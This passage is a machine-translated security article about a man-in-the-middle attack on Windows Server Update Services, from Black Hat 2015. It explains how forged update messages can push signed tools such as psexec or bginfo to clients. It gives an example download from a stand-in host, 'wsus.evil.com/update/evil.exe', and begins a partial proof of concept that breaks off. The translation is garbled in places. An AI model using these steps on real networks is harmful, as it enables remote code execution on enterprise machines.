Blackhat topic: WSUS exploit the theory with the practice-vulnerability warning-the black bar safety net

2015-08-29T00:00:00
ID MYHACK58:62201566320
Type myhack58
Reporter 佚名
Modified 2015-08-29T00:00:00

Description

Paul Stone and Alex Chapman in Blackhat2015 made a about Windows Server Update Service (WSUS) vulnerabilities. An attacker can use MiTM(Man In The Middle, MITM)attack to exploit the vulnerability, allowing users to download and install the fake update. It is well known that Microsoft through the Windows Update Service (update service)to provide users with updates. The client periodically run wuauctl. exe with the update server communication to check the current if there is a new update. If there is, then download and install these updates. In the enterprise environment, thousands of clients repeatedly download the same update will undoubtedly be the bandwidth causing great waste. Moreover the administrator is also very difficult to update the installation for effective control. Windows Server Update Service (WSUS) is a good solution to this problem. WSUS can be said to be an Update Agent Server: WSUS server from the Internet to download updates and cache locally and on the network in the other windows computer to provide the Update Service. As a result, the network in the other windows computers from this WSUS server to download updates, but not from the Internet. 1. The client on the WSUS connection settings In the registry, check HKLM\Software\Policies\Microsoft\Windows\Windows Update\AU UseWUServer value to 1 of 1 for enabled, 0 for disabled. WSUS-specific connection settings are stored in HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Windows Update\WUServer for example, http://wsus-server.com:8530 http is the underlying connection Protocol, the wsus-server. com is the WSUS server name, 8 5 3 0 is the port number. ! Of course, if the WSUS server to support it, we can also use https instead of http. But Microsoft's default setting is http. But most businesses are reluctant to burden hefty of the certificate fee to support https. 2. WSUS Protocol WSUS package in HTTP in SOAP XML message to communicate. The client first tells the update server itself is already installed which updates SyncUpdates it. The update server then returns a result(SyncUpdatesResult), the description of the server on what the new update can be provided to the client. The client further asks the new update specific information(GetExtendedUpdateInfo)。 The last update of the server the specific information to inform the client(GetExtendedUpdateInfoResult)。 As shown in the figure, note that the SyncUpdates made it twice, the first time was for a software update, and the second is for hardware driver updates. ! According to the diagram above, give an intuitive example: 1. Client: about the software update, I have installed the update, No. 1,No. 2 and No. 3, recently there is a new update? 2. WSUS server: there is! I have to update 4 number of information, you can install it. 3. (Omitted hardware synchronization updates 4. (Omitted hardware synchronization to update the results 5. Client: so I want to install the Software Update 4, can provide specific information? 6. WSUS server: okay, you can from the http://1.2.3.4/update/4. cab download update 4, note that its Sha1 hash values is A1...FF. After downloading, the client will check the update of the hash value and the signature, if everything is normal, the client will automatically install the update or remind the user to manually installed. 3. Risk The WSUS server by default supports only http. We know that http itself is not safe, we can not guarantee message confidentiality, integrity, also cannot let the client to the server for authentication. So an attacker can use MiTM(Man In The Middle, MITM)hijacking WSUS communication, insert a fake update information to trick the client. The many ways you can be man in the middle attacks, such as the use of arp spoofing, there is not an in-depth discussion. This article focuses on how to forge WSUS message. The attacker can in SyncUpdatesResult inserted into the forgery of the update ID, and then in GetExtendedUpdateInfoResult continue to provide a fake URL, etc., to deceive the client to download and install, as shown below ! An attack of the examples are as follows: 1. Client: about the software update, I have installed the update, No. 1,No. 2 and No. 3, recently there is a new update? 2. WSUS server: no. 3. Attack: there! I have to update 4 number of information, you can install it. 4. (Omitted hardware synchronization updates 5. (Omitted hardware synchronization to update the results 6. Client: so I want to install the Software Update 4, can provide specific information? 7. Attacker: well, you can from the http://wsus. evil. com/update/evil. exe download update 4, note that its Sha1 hash value is BF...EF. In this case, the client will from http://wsus. evil. com/update/ 下载 evil.exe the. Please note that there is also a layer of protection mechanisms: all download the software update must have a Microsoft signature. If the signature verification is unsuccessful, then the downloaded update will be deleted immediately. We know Microsoft's signature is hard to fake, that is not no way? In fact, we have no need to forge a signature, think about those that have been Microsoft's signature software, especially the sysinternals tools, many of which can be used to do bad things, such as psexec and bginfo is a Microsoft signature procedure. (第一 个 想到 的 是 cmd.exe but cmd. exe actually and is not Microsoft signed L 1. psexec: lightweight telnet (http://baike.baidu.com/view/555225.htm) 2. bginfo: you can execute the vbs script(https://technet.microsoft.com/zh-cn/2007.08.utilityspotlight) Thus, the attacker can put psexec or bginfo disguised as updates, with configuration of the installation script, push to the client can be installed to run. 4. Proof Of Concept (POC) Paul Stone and Alex Chapman to provide the POC seems to have some bugs,at least I'm not the test is successful. Here I provide a personally modified the POC. This POC aims to put the bginfo disguised as an update pushed to the client, so it downloaded and installed. I'm in the local used burp suite to hijack and modify the WSUS message 1. The following message is inserted into the first SyncUpdatesResult message, false front 1 9 9 9 9 9 9 2 1 9 9 9 9 2 Bundle true 2015-08-20 0 0 0 0 true

1 9 9 9 9 9 9 3 1 9 9 9 9 3 Install true 2015-08-20 0 0 0 0 true

2. The second SyncUpdatesResult message is about a hardware driver, without modification, directly let go 3. Delete GetExtendedUpdateInfo message in 1 9 9 9 9 9 9 2 1 9 9 9 9 9 9 3, and then let go 4. In GetExtendedUpdateInfoResult message in the...plus

[1] [2] next